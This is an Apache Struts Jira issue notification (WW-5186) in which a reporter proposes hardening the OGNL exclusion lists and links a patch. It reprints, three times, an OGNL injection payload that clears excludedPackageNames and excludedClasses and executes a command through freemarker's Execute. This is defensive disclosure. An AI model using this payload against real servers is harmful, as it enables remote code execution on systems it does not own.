You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "tanli (Jira)" <ji...@apache.org> on 2022/06/10 03:00:00 UTC
[jira] [Updated] (WW-5186) protect excludedClasses and excludedPackageNames
[ https://issues.apache.org/jira/browse/WW-5186?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
tanli updated WW-5186:
----------------------
Description:
protect excludedClasses and excludedPackageNames
1)use st062 exp below,attacker clean {{{}excluded{}}}{{{}PackageNames {}}}use
{{'excluded'+'PackageNames'}}
also worked.
```
{{%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))
}}}
```
2)to protect struts i push a patch with
[github pull|https://github.com/apache/struts/pull/564]
was:
protect excludedClasses and excludedPackageNames
1)use st062 exp below,attacker clean {{{}excluded{}}}{{{}PackageNames{}}}{{ use }}{{'excluded'+'PackageNames'}} also worked.
```
{{%\{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))
}}}
```
2)to protect struts i push a patch with
[github pull|https://github.com/apache/struts/pull/564]
> protect excludedClasses and excludedPackageNames
> ------------------------------------------------
>
> Key: WW-5186
> URL: https://issues.apache.org/jira/browse/WW-5186
> Project: Struts 2
> Issue Type: Improvement
> Components: Core
> Affects Versions: 2.5.30, 6.0.0
> Reporter: tanli
> Priority: Trivial
>
> protect excludedClasses and excludedPackageNames
> 1)use st062 exp below,attacker clean {{{}excluded{}}}{{{}PackageNames {}}}use
> {{'excluded'+'PackageNames'}}
> also worked.
> ```
>
> {{%{
> (#request.a=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.a.setBean(#request.get('struts.valueStack')) == true) +
> (#request.b=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.b.setBean(#request.get('a').get('context'))) +
> (#request.c=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.c.setBean(#request.get('b').get('memberAccess'))) +
> (#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))
> }}}
> ```
>
> 2)to protect struts i push a patch with
> [github pull|https://github.com/apache/struts/pull/564]
--
This message was sent by Atlassian Jira
(v8.20.7#820007)